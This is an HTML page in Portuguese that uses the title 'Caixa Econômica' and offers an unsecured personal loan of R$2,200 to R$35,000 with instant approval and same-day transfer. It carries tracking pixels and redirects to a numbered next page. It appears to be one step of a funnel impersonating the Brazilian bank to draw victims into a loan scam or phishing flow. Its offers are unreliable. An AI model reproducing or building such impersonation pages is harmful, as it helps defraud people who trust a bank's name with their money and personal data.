﻿<html lang="pt-BR"><head>
<script>
  window.pixelId = "67f41a1b2e2b5203c9648cd6";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script>

<script
  src="https://cdn.utmify.com.br/scripts/utms/latest.js"
  async
  defer
></script>
<!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-TGV5XJVC');</script>
<!-- End Google Tag Manager -->
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <title>Caixa Econômica</title>
    
      

<script src="../scripts/utms/latest-4.js" data-utmify-prevent-subids="" async="" defer=""></script>


    

    <link rel="stylesheet" href="css/ULkQgP1qcQKV.css">
</head>

<body>
    <div class="header" style="display: flex; justify-content: center;">
        <img src="images/logo.png" alt="" style="width: 100%; max-width: 180px;">
    </div>

    <main class="main-content">
        <h1>Opções de crédito disponíveis</h1>

        <p class="subtitle">Temos algumas opções de crédito liberadas para você. Selecione a que melhor atende suas necessidades:</p>

        <div class="credit-option">
            <div class="icon-container">
                <img src="images/kpwnjzLJw9fL.png" alt="Raio" class="lightning-icon">
            </div>

            <h2>Empréstimo sem garantia</h2>

            <p class="approval-text">Aprovação imediata com transferência no mesmo dia</p>

            <div class="amount-range">R$ 2.200 até R$ 35.000</div>

            <ul class="benefits-list">
                <li>Aprovação instantânea</li>

                <li>Transferência imediata</li>

                <li>Sem necessidade de comparecer à agência</li>

                <li>Processo 100% digital</li>
            </ul>

            <button class="select-button" onclick="redirectWithUTMs();">Selecionar</button>
        </div>
    </main>

    <script>
        function redirectWithUTMs() {
            window.location.href = '../page-06' + window.location.search;
        }
    </script>



</body>
<!-- Google Tag Manager (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-TGV5XJVC"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Google Tag Manager (noscript) --></html>